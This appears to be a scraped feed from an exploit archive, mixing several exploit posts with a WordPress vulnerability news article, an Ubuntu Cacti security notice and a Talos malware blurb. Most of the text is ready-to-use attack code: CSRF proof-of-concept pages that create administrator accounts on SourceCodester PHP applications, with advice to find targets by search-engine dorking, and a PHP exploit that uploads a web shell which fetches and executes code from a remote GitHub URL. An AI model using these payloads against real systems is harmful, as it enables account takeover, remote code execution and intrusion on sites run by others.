Medical Center Portal version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Medical Center Portal 1.0 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/medic.zip                                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 52.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Registration Form</title>    <style>        body {            font-family: Arial, sans-serif;            margin: 20px;            padding: 20px;            max-width: 600px;            background-color: #f4f4f4;            border-radius: 8px;        }        .form-container {            display: flex;            flex-direction: column;        }        .form-group {            margin-bottom: 15px;        }        .form-group label {            font-weight: bold;            margin-bottom: 5px;            display: block;        }        .form-group input, .form-group select {            padding: 8px;            width: 100%;            border: 1px solid #ccc;            border-radius: 4px;        }        .form-group select {            cursor: pointer;        }        .form-group button {            padding: 10px 15px;            background-color: #007bff;            color: white;            border: none;            cursor: pointer;            border-radius: 4px;        }        .form-group button:hover {            background-color: #0056b3;        }    </style></head><body>    <h2>Registration Form</h2>    <form action="http://127.0.0.1/medic/pages/register.php?action=add" method="POST" class="form-container">        <div class="form-group">            <label for="firstname">First Name:</label>            <input type="text" id="firstname" name="firstname" required>        </div>        <div class="form-group">            <label for="nid">National ID (NID):</label>            <input type="text" id="nid" name="nid" required>        </div>        <div class="form-group">            <label for="gender">Gender:</label>            <select id="gender" name="gender" required>                <option value="">Select Gender</option>                <option value="male">Male</option>                <option value="female">Female</option>            </select>        </div>        <div class="form-group">            <label for="email">Email:</label>            <input type="email" id="email" name="email" required>        </div>        <div class="form-group">            <label for="phonenumber">Phone Number:</label>            <input type="text" id="phonenumber" name="phonenumber" required>        </div>        <div class="form-group">            <label for="jobs">Job:</label>            <select id="jobs" name="jobs" required>                <option value="">Select Job</option>                <option value="doctor">Doctor</option>                <option value="nurse">Nurse</option>                <option value="pharmacist">Pharmacist</option>            </select>        </div>        <div class="form-group">            <label for="province">Province:</label>            <select id="province" name="province" required>                <option value="">Select Province</option>                <option value="province1">Province 1</option>                <option value="province2">Province 2</option>                <option value="province3">Province 3</option>            </select>        </div>        <div class="form-group">            <label for="city">City:</label>            <select id="city" name="city" required>                <option value="">Select City</option>                <option value="city1">City 1</option>                <option value="city2">City 2</option>                <option value="city3">City 3</option>            </select>        </div>        <div class="form-group">            <label for="username">Username:</label>            <input type="text" id="username" name="username" required>        </div>        <div class="form-group">            <label for="password">Password:</label>            <input type="password" id="password" name="password" required>        </div>        <div class="form-group">            <button type="submit">Register</button>        </div>    </form></body></html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Medical Center Portal 1.0 Cross Site Request Forgery

Event Registration and Attendance System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Event Registration and Attendance System 1.0 CSRF Vulnerability                                                             |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip                                |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

  [+] Line 27 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">User Name:</label>  
        <input type="username" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/news_portal/admin/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Event Registration and Attendance System 1.0 Cross Site Request Forgery

Cab Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : cab management system 1.0 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.  [+] Line 6 : Set your target url[+] Line 15+19 : Set your user & pass[+] save payload as poc.html [+] payload : <!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://127.0.0.1/cms/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Cab Management System 1.0 Cross Site Request Forgery

Alphaware E-Commerce System version 1.0 suffers from a code injection vulnerability.

    =============================================================================================================================================| # Title     : Alphaware E-CommerceSystem 1.0 php code injection Vulnerability                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.    combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            // Safely include the content of the remote PHP file            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(        'add' => '',        'product_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'product_name' => 'inouva',        'product_price' => '123',        'product_size' => '99',        'brand' => 'N0_name',        'category' => 'Hackers',        'qty' => '1'    );    echo "(+) PHP Code Injection ...\n";    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/alphaware/admin/admin_football.php");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/alphaware/photo/$file_name\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);[+] Path : http://127.0.0.1/alphaware/photo/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Alphaware E-Commerce System 1.0 Code Injection

Cisco Talos has uncovered a new remote access trojan (RAT) family we are calling “MoonPeak.” This a XenoRAT-based malware, which is under active development by a North Korean nexus cluster we are calling “UAT-5394.”

MoonPeak malware from North Korean actors unveils new details on attacker infrastructure

A maximum-severity security flaw has been disclosed in the WordPress GiveWP donation and fundraising plugin that exposes more than 100,000 websites to remote code execution attacks.
The flaw, tracked as CVE-2024-5932 (CVSS score: 10.0), impacts all versions of the plugin prior to version 3.14.2, which was released on August 7, 2024. A security researcher, who goes by the online alias villu164,

WordPress / Cybersecurity

A maximum-severity security flaw has been disclosed in the WordPress GiveWP donation and fundraising plugin that exposes more than 100,000 websites to remote code execution attacks.

The flaw, tracked as CVE-2024-5932 (CVSS score: 10.0), impacts all versions of the plugin prior to version 3.14.2, which was released on August 7, 2024. A security researcher, who goes by the online alias villu164, has been credited with discovering and reporting the issue.

The plugin is "vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give\_title' parameter," Wordfence said in a report this week.

"This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files."

The vulnerability is rooted in a function named "give\_process\_donation\_form()," which is used to validate and sanitize the entered form data, before passing the donation information, including the payment details, to the specified gateway.

Successful exploitation of the flaw could enable an authenticated threat actor to execute malicious code on the server, making it imperative that users take steps to update their instances to the latest version.

The disclosure comes days after Wordfence also detailed another critical security flaw in the InPost PL and InPost for WooCommerce WordPress plugins (CVE-2024-6500, CVSS score: 10.0) that makes it possible for unauthenticated threat actors to read and delete arbitrary files, including the wp-config.php file.

On Linux systems, only files within the WordPress install directory can be deleted, but all files can be read. The issue has been patched in version 1.4.5.

Another critical shortcoming in JS Help Desk, a WordPress plugin with more than 5,000 active installations, has also been uncovered (CVE-2024-7094, CVSS score: 9.8) as enabling remote code execution due to a PHP code injection flaw. A patch for the vulnerability has been released in version 2.8.7.

Some of the other security flaws resolved in various WordPress plugins are listed below -

*   CVE-2024-6220 (CVSS score: 9.8) - An arbitrary file upload flaw in the 简数采集器 (Keydatas) plugin that allows unauthenticated attackers to upload arbitrary files on the affected site's server, ultimately resulting in code execution

*   CVE-2024-6467 (CVSS score: 8.8) - An arbitrary file read flaw in the BookingPress appointment booking plugin that allows authenticated attackers, with Subscriber-level access and above, to create arbitrary files and execute arbitrary code or access sensitive information

*   CVE-2024-5441 (CVSS score: 8.8) - An arbitrary file upload flaw in the Modern Events Calendar plugin that allows authenticated attackers, with subscriber access and above, to upload arbitrary files on the affected site's server and execute code

*   CVE-2024-6411 (CVSS score: 8.8) - A privilege escalation flaw in the ProfileGrid – User Profiles, Groups and Communities plugin that allows authenticated attackers, with Subscriber-level access and above, to update their user capabilities to that of an Administrator

Patching against these vulnerabilities is a crucial line of defense against attacks that exploit them to deliver credit card skimmers that are capable of harvesting financial information entered by site visitors.

Last week, Sucuri shed light on a skimmer campaign that injects PrestaShop e-commerce websites with malicious JavaScript that leverages a WebSocket connection to steal credit card details.

The GoDaddy-owned website security company has also warned WordPress site owners against installing nulled plugins and themes, stating they could act as a vector for malware and other nefarious activities.

"In the end, sticking with legitimate plugins and themes is a fundamental part of responsible website management and security should never be compromised for the sake of a shortcut," Sucuri said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GiveWP WordPress Plugin Vulnerability Puts 100,000+ Websites at Risk

Ubuntu Security Notice 6969-1 - It was discovered that Cacti did not properly apply checks to the "Package Import" feature. An attacker could possibly use this issue to perform arbitrary code execution. This issue only affected Ubuntu 24.04 LTS, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS. It was discovered that Cacti did not properly sanitize values when using javascript based API. A remote attacker could possibly use this issue to inject arbitrary javascript code resulting into cross-site scripting vulnerability. This issue only affected Ubuntu 24.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6969-1  
August 20, 2024

cacti vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

Several security issues were fixed in Cacti.

Software Description:  
- cacti: web interface for graphing of monitoring systems

Details:

It was discovered that Cacti did not properly apply checks to the "Package  
Import" feature. An attacker could possibly use this issue to perform  
arbitrary code execution. This issue only affected Ubuntu 24.04 LTS, Ubuntu  
22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS. (CVE-2024-25641)

It was discovered that Cacti did not properly sanitize values when using  
javascript based API. A remote attacker could possibly use this issue to  
inject arbitrary javascript code resulting into cross-site scripting  
vulnerability. This issue only affected Ubuntu 24.04 LTS. (CVE-2024-29894)

It was discovered that Cacti did not properly sanitize values when managing  
data queries. A remote attacker could possibly use this issue to inject  
arbitrary javascript code resulting into cross-site scripting  
vulnerability. (CVE-2024-31443)

It was discovered that Cacti did not properly sanitize values when reading  
tree rules with Automation API. A remote attacker could possibly use this  
issue to inject arbitrary javascript code resulting into cross-site  
scripting vulnerability. (CVE-2024-31444)

It was discovered that Cacti did not properly sanitize  
"get_request_var('filter')" values in the "api_automation.php" file. A  
remote attacker could possibly use this issue to perform SQL injection  
attacks. This issue only affected Ubuntu 24.04 LTS, Ubuntu 22.04 LTS,  
Ubuntu 20.04 LTS and Ubuntu 18.04 LTS. (CVE-2024-31445)

It was discovered that Cacti did not properly sanitize data stored in  
"form_save()" function in the "graph_template_inputs.php" file. A remote  
attacker could possibly use this issue to perform SQL injection attacks.  
(CVE-2024-31458)

It was discovered that Cacti did not properly validate the file urls from  
the lib/plugin.php file. An attacker could possibly use this issue to  
perform arbitrary code execution. (CVE-2024-31459)

It was discovered that Cacti did not properly validate the data stored in  
the "automation_tree_rules.php". A remote attacker could possibly use this  
issue to perform SQL injection attacks. This issue only affected Ubuntu  
24.04 LTS, Ubuntu 22.04 LTS, Ubuntu 20.04 LTS and Ubuntu 18.04 LTS.  
(CVE-2024-31460)

It was discovered that Cacti did not properly verify the user password.  
An attacker could possibly use this issue to bypass authentication  
mechanism. This issue only affected Ubuntu 24.04 LTS, Ubuntu 22.04 LTS,  
Ubuntu 20.04 LTS and Ubuntu 18.04 LTS. (CVE-2024-34360)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  cacti                           1.2.26+ds1-1ubuntu0.1

Ubuntu 22.04 LTS  
  cacti                           1.2.19+ds1-2ubuntu1.1

Ubuntu 20.04 LTS  
  cacti                           1.2.10+ds1-1ubuntu1.1

Ubuntu 18.04 LTS  
  cacti                           1.1.38+ds1-1ubuntu0.1~esm3  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  cacti                           0.8.8f+ds1-4ubuntu4.16.04.2+esm2  
                                  Available with Ubuntu Pro

Ubuntu 14.04 LTS  
  cacti                           0.8.8b+dfsg-5ubuntu0.2+esm2  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6969-1  
  CVE-2024-25641, CVE-2024-29894, CVE-2024-31443, CVE-2024-31444,  
  CVE-2024-31445, CVE-2024-31458, CVE-2024-31459, CVE-2024-31460,  
  CVE-2024-34340

Package Information:  
  https://launchpad.net/ubuntu/+source/cacti/1.2.26+ds1-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/cacti/1.2.19+ds1-2ubuntu1.1  
  https://launchpad.net/ubuntu/+source/cacti/1.2.10+ds1-1ubuntu1.1

Ubuntu Security Notice USN-6969-1

Akuvox Smart Intercom/Doorphone suffers from an unauthenticated live stream disclosure when requesting video.cgi endpoint on port 8080. Many versions are affected.

    Akuvox Smart Intercom/Doorphone Unauthenticated Stream DisclosureVendor: The Akuvox CompanyProduct web page: https://www.akuvox.comAffected version: Doorphone:                    S539                    S532                    X916                    X915                    X912                    R29                  Intercom:                    R20K-2                    R20A-2                    C313W-2                    NS-2                    NC-2                    NX-2                  Firmware: 912.30.1.137Summary: Vandal-resistant Door Phone for High-end Buildings. Offeringtop-of-the-line features, Akuvox X912 is targeted at high-end residentialand commercial projects. With a compact size, it is perfect for buildingswith limited installation space.Desc: The application suffers from an unauthenticated live stream disclosurewhen requesting video.cgi endpoint on port 8080.Tested on: lighttpd/1.4.30           EasyHttpServerVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5826Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5826.php25.02.2024--$ firefox http://192.168.1.2:8080/video.cgi

Akuvox Smart Intercom/Doorphone Unauthenticated Stream Disclosure

Lost and Found Information System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Lost and Found Information System v1.0 v1.0 CSRF Vulnerability                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip                                          |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following JavaScript code :

   creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:

[+] Create an XMLHttpRequest object:

    xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.

[+] Open the request:

    xhr.open("POST", "http://127.0.0.1/php-lfis/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server)   
  using the HTTP method "POST".

[+] Set the request headers:

    xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.  
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.  
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request   
  as multipart/form-data with specified boundaries.

[+] Enable sending cookies:

    xhr.withCredentials = true; Specifies that cookies should be sent with the request.

[+] Setting up the request data:

    The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.

    This string is converted to a Uint8Array and then to a Blob to be sent.

[+] Sending the request:

    xhr.send(new Blob([aBody])); Sends the data to the server.

[+] User Interface:  
    There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.

[+] Go to the line 6. Set the target site link Save changes and apply . 

[+] infected file : Users.php.

[+] Line 15 : Choose a name "indoushka".

[+] Line 19 : Choose a pass "Hacked".

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>   
<html>   
<body>  
 <script> function submitRequest()   
 { var xhr = new XMLHttpRequest();   
 xhr.open("POST", "http:\/\/127.0.0.1\/php-lfis\/classes\/Users.php?f=save", true);   
 xhr.setRequestHeader("Accept", "*\/*");   
 xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
 xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");  
 xhr.withCredentials = true;   
 var body =  
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"username\"\r\n" +   
 "\r\n" +   
 "indoushka\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"password\"\r\n" +   
 "\r\n" +   
 "Hacked\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"type\"\r\n" +   
 "\r\n" +   
 "1\r\n" +   
 "-------------------------------\r\n";   
 var aBody = new Uint8Array(body.length);   
 for (var i = 0; i < aBody.length; i++)   
 aBody[i] = body.charCodeAt(i);   
 xhr.send(new Blob([aBody]));   
 }  
 </script>  
 <form action="#">  
 <input type="button" value="Submit request" onclick="submitRequest();" />  
 </form>   
 </body>   
 </html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Lost and Found Information System 1.0 Cross Site Request Forgery

Loan Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Loan Management System 1.0 CSRF Vulnerability                                                                               |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system.zip                            |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/loan/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Tag

#php